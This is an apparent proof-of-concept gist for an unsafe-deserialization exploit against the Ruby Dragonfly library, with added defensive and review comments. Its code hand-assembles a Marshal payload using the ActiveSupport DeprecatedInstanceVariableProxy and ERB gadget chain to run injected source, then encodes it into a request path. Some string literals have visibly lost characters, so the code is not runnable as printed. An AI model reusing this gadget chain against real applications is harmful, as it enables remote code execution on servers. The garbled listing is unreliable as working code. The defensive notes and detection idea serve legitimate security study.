Created November 14, 2013 09:04
Dragonfly marshal exploit PoC
# Proof of concept for an unsafe-deserialization flaw: the URL path segment
# built below is Base64-encoded Ruby Marshal data. A server that passes such a
# segment to Marshal.load without first verifying its integrity will
# instantiate whatever object graph the requester supplied.
#
# Defensive takeaways:
#   - Never Marshal.load data taken from a URL, cookie or other client input;
#     use a data-only format (e.g. JSON) or verify an HMAC before decoding.
#   - NOTE(review): Dragonfly is understood to offer a configured secret that
#     signs job URLs, and later releases are understood to have moved away
#     from Marshal for URL jobs -- confirm against the deployed version's docs.
#   - Detection idea: Base64-decode suspicious media-path segments and look for
#     the Marshal header bytes 0x04 0x08 followed by an object record ("o:")
#     naming classes such as the two that appear in the literal below.
#
# NOTE(review): the probe request this original comment refers to is not shown
# on this page.
# If responds, then:
string = "Here's a scary exploit"
# Ruby source text that ends up as the ERB object's @src in the stream below.
# NOTE(review): as printed, this is a plain string literal with no
# interpolation; the listing appears to have lost characters in extraction, so
# treat it as illustrative rather than runnable.
code = "{string.inspect})"
# Hand-assembled Marshal stream. "\x04\x08" is the Marshal format version
# (4.8); "o:" introduces an object record. The stream describes an
# ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy with two instance
# variables: @instance, an ERB object whose @src is `code`, and @method, the
# symbol :result. Marshal.dump(code)[2..-1] drops the 2-byte version header so
# the dumped string can be embedded mid-stream.
# Presumably the proxy forwards the first method call made on it to
# @instance.result, which is what makes merely unmarshalling and then touching
# the object dangerous -- verify against the ActiveSupport version in use.
marshalled = "\x04\x08o:\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0E@instanceo:\x08ERB\x06:\x09@src" + Marshal.dump(code)[2..-1] + ":\x0C@method:\x0Bresult"
# Base64-encode the stream, strip newlines and "=" padding, and replace "/"
# with "~" so the result fits in a single URL path segment.
base64ed = Base64.encode64(marshalled).tr("\n=",'').tr('/','~')
# Resulting request path: encoded segment followed by a file-style suffix.
# NOTE(review): as printed, this too is a literal without interpolation, and no
# host or mount prefix is shown on this page.
url = "{base64ed}/basename.format"
